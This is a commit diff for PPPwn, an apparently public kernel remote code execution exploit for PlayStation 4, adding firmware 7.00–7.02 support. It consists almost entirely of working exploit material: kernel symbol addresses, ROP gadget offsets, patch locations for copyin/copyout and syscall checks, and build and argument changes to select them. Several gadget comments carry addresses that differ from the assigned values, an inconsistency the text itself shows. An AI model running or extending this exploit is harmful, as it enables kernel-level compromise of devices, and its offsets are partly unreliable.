Added PS4 7.00 7.01 7.02 Offsets (#59)

README.md

@@ -2,6 +2,7 @@
 PPPwn is a kernel remote code execution exploit for PlayStation 4 up to FW 11.00. This is a proof-of-concept exploit for [CVE-2006-4304](https://hackerone.com/reports/2177925) that was reported responsibly to PlayStation.
 
 Supported versions are:
+- FW 7.00 / 7.01 / 7.02
 - FW 7.50 / 7.51 / 7.55
 - FW 8.00 / 8.01 / 8.03
 - FW 8.50 / 8.52

offsets.py

@@ -3,6 +3,100 @@
 # This software may be modified and distributed under the terms
 # of the MIT license.  See the LICENSE file for details.
 
+# FW 7.00 / 7.01 / 7.02
+class OffsetsFirmware_700_702:
+    PPPOE_SOFTC_LIST = 0xffffffff844ad838
+
+    KERNEL_MAP = 0xffffffff843c8ee0
+
+    SETIDT = 0xffffffff82692400
+
+    KMEM_ALLOC = 0xffffffff823170f0
+    KMEM_ALLOC_PATCH1 = 0xffffffff823171be
+    KMEM_ALLOC_PATCH2 = 0xffffffff823171c6
+
+    MEMCPY = 0xffffffff8222f040
+
+    # 0xffffffff82660609 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
+    MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823b7169
+
+    SECOND_GADGET_OFF = 0x3b
+
+    # 0xffffffff822f52ed : jmp qword ptr [rsi + 0x3b]
+    FIRST_GADGET = 0xffffffff822f52ed
+
+    # 0xffffffff82c72e66 : push rbp ; jmp qword ptr [rsi]
+    PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c928d6
+
+    # 0xffffffff82699bc1 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10]
+    POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff82699bc1
+
+    # 0xffffffff82945dc6 : lea rsp, [rsi + 0x20] ; repz ret
+    LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82945dc6
+
+    # 0xffffffff826d56ad : add rsp, 0x28 ; pop rbp ; ret
+    ADD_RSP_28_POP_RBP_RET = 0xffffffff826d56ad
+
+    # 0xffffffff8252a48a : add rsp, 0xb0 ; pop rbp ; ret
+    ADD_RSP_B0_POP_RBP_RET = 0xffffffff8252a48a
+
+    # 0xffffffff822005a1 : ret
+    RET = 0xffffffff822005a1
+
+    # 0xffffffff8255325a : pop rdi ; ret
+    POP_RDI_RET = 0xffffffff8255325a
+
+    # 0xffffffff8230d34e : pop rsi ; ret
+    POP_RSI_RET = 0xffffffff8230d34e
+
+    # 0xffffffff8299ae06 : pop rdx ; ret
+    POP_RDX_RET = 0xffffffff8299ae06
+
+    # 0xffffffff822563a6 : pop rcx ; ret
+    POP_RCX_RET = 0xffffffff822563a6
+
+    # 0xffffffff82326dcd : pop r8 ; pop rbp ; ret
+    POP_R8_POP_RBP_RET = 0xffffffff82326dcd
+
+    # 0xffffffff827d2b4f : pop r12 ; ret
+    POP_R12_RET = 0xffffffff827d2b4f
+
+    # 0xffffffff82407b54 : pop rax ; ret
+    POP_RAX_RET = 0xffffffff82407b54
+
+    # 0xffffffff822008f2 : pop rbp ; ret
+    POP_RBP_RET = 0xffffffff822008f2
+
+    # 0xffffffff82bd348a : push rsp ; pop rsi ; ret
+    PUSH_RSP_POP_RSI_RET = 0xffffffff82bd348a
+
+    # 0xffffffff822fb490 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax
+    MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff822fb490
+
+    # 0xffffffff82b910ba : mov byte ptr [rcx], al ; ret
+    MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b910ba
+
+    # 0xffffffff82644739 : mov rdi, rbx ; call r12
+    MOV_RDI_RBX_CALL_R12 = 0xffffffff82644739
+
+    # 0xffffffff82644535 : mov rdi, r14 ; call r12
+    MOV_RDI_R14_CALL_R12 = 0xffffffff82644535
+
+    # 0xffffffff822ad8e1 : mov rsi, rbx ; call rax
+    MOV_RSI_RBX_CALL_RAX = 0xffffffff822ad8e1
+
+    # 0xffffffff8266a598 : mov r14, rax ; call r8
+    MOV_R14_RAX_CALL_R8 = 0xffffffff8266a598
+
+    # 0xffffffff82cd2aca : add rdi, rcx ; ret
+    ADD_RDI_RCX_RET = 0xffffffff82cd2aca
+
+    # 0xffffffff82583b8a : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret
+    SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82583b8a
+
+    # 0xffffffff82ba226b : jmp r14
+    JMP_R14 = 0xffffffff82ba226b
+
 # FW 7.50 / 7.51 / 7.50
 class OffsetsFirmware_750_755:
     PPPOE_SOFTC_LIST =  0xffffffff8433fcd0

pppwn.py

@@ -828,7 +828,7 @@ def main():
     parser.add_argument('--interface', required=True)
     parser.add_argument('--fw',
                         choices=[
-                            '750', '751', '755',
+                            '700','701','702','750', '751', '755',
                             '800', '801', '803', '850', '852',
                             '900', '903', '904', '950', '951', '960',
                             '1000', '1001', '1050', '1070', '1071',
@@ -848,7 +848,9 @@ def main():
     with open(args.stage2, mode='rb') as f:
         stage2 = f.read()
 
-    if args.fw in ('750', '751', '755'):
+    if args.fw in ('700', '701', '702'):
+        offs = OffsetsFirmware_700_702()
+    elif args.fw in ('750', '751', '755'):
         offs = OffsetsFirmware_750_755()
     elif args.fw in ('800', '801', '803'):
         offs = OffsetsFirmware_800_803()

stage1/Makefile

@@ -6,7 +6,7 @@ OBJCOPY = objcopy
 CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector -fpic -fpie
 LDFLAGS = -T linker.ld -nostartfiles -nostdlib
 
-ifneq ($(filter $(FW), 750 751 755 800 801 803 850 852 900 903 904 950 951 960 1000 1001 1050 1070 1071 1100),)
+ifneq ($(filter $(FW), 700 701 702 750 751 755 800 801 803 850 852 900 903 904 950 951 960 1000 1001 1050 1070 1071 1100),)
 CFLAGS += -DFIRMWARE=$(FW)
 else
 $(error "Invalid firmware")

stage1/offsets.h

@@ -8,7 +8,35 @@
 #ifndef __OFFSETS_H__
 #define __OFFSETS_H__
 
-#if (FIRMWARE == 750 || FIRMWARE == 751 || FIRMWARE == 755) // FW 7.50 / FW 7.51 / FW 7.55
+#if (FIRMWARE == 700 || FIRMWARE == 701 || FIRMWARE == 702) // FW 7.00 / FW 7.01 / FW 7.02
+
+#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
+
+#define kdlsym_addr_pppoe_softc_list 0xffffffff844ad838
+
+#define kdlsym_addr_cc_cpu 0xffffffff8432d310
+#define kdlsym_addr_callwheelsize 0xffffffff8432f310
+
+#define kdlsym_addr_nd6_llinfo_timer 0xffffffff82680fb0
+
+#define kdlsym_addr_Xill 0xffffffff824e86b0
+#define kdlsym_addr_setidt 0xffffffff82692400
+
+#define kdlsym_addr_kernel_map 0xffffffff843c8ee0
+#define kdlsym_addr_kmem_alloc 0xffffffff823170f0
+
+#define kdlsym_addr_kproc_create 0xffffffff822c4170
+#define kdlsym_addr_kproc_exit 0xffffffff822c43e0
+
+#define kdlsym_addr_ksock_create 0xffffffff82340610
+#define kdlsym_addr_ksock_close 0xffffffff82340680
+#define kdlsym_addr_ksock_bind 0xffffffff82340690
+#define kdlsym_addr_ksock_recv 0xffffffff823409f0
+
+#define kdlsym_addr_uart_patch 0xffffffff83c6eaa0
+#define kdlsym_addr_veri_patch 0xffffffff8283acce
+
+#elif (FIRMWARE == 750 || FIRMWARE == 751 || FIRMWARE == 755) // FW 7.50 / FW 7.51 / FW 7.55
 
 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
 

stage2/Makefile

@@ -6,7 +6,7 @@ OBJCOPY = objcopy
 CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector -fpic -fpie
 LDFLAGS = -T linker.ld -nostartfiles -nostdlib
 
-ifneq ($(filter $(FW), 750 751 755 800 801 803 850 852 900 903 904 950 951 960 1000 1001 1050 1070 1071 1100),)
+ifneq ($(filter $(FW), 700 701 702 750 751 755 800 801 803 850 852 900 903 904 950 951 960 1000 1001 1050 1070 1071 1100),)
 CFLAGS += -DFIRMWARE=$(FW)
 else
 $(error "Invalid firmware")

stage2/offsets.h

@@ -8,7 +8,30 @@
 #ifndef __OFFSETS_H__
 #define __OFFSETS_H__
 
-#if (FIRMWARE == 750 || FIRMWARE == 751 || FIRMWARE == 755) // FW 7.50 / FW 7.51 / FW 7.55
+#if (FIRMWARE == 700 || FIRMWARE == 701 || FIRMWARE == 702) // FW 7.00 / FW 7.01 / FW 7.02
+
+#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
+
+#define kdlsym_addr_printf 0xffffffff822bc730
+
+#define kdlsym_addr_sysent 0xffffffff83325660
+
+#define kdlsym_addr_amd_syscall_patch1 0xffffffff82200490
+#define kdlsym_addr_amd_syscall_patch2 0xffffffff822004b5
+#define kdlsym_addr_amd_syscall_patch3 0xffffffff822004b9
+#define kdlsym_addr_amd_syscall_patch4 0xffffffff822004c2
+
+#define kdlsym_addr_copyin_patch1 0xffffffff8222f287
+#define kdlsym_addr_copyin_patch2 0xffffffff8222f293
+
+#define kdlsym_addr_copyout_patch1 0xffffffff8222f192
+#define kdlsym_addr_copyout_patch2 0xffffffff8222f19e
+
+#define kdlsym_addr_copyinstr_patch1 0xffffffff8222f733
+#define kdlsym_addr_copyinstr_patch2 0xffffffff8222f73f
+#define kdlsym_addr_copyinstr_patch3 0xffffffff8222f770
+
+#elif (FIRMWARE == 750 || FIRMWARE == 751 || FIRMWARE == 755) // FW 7.50 / FW 7.51 / FW 7.55
 
 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0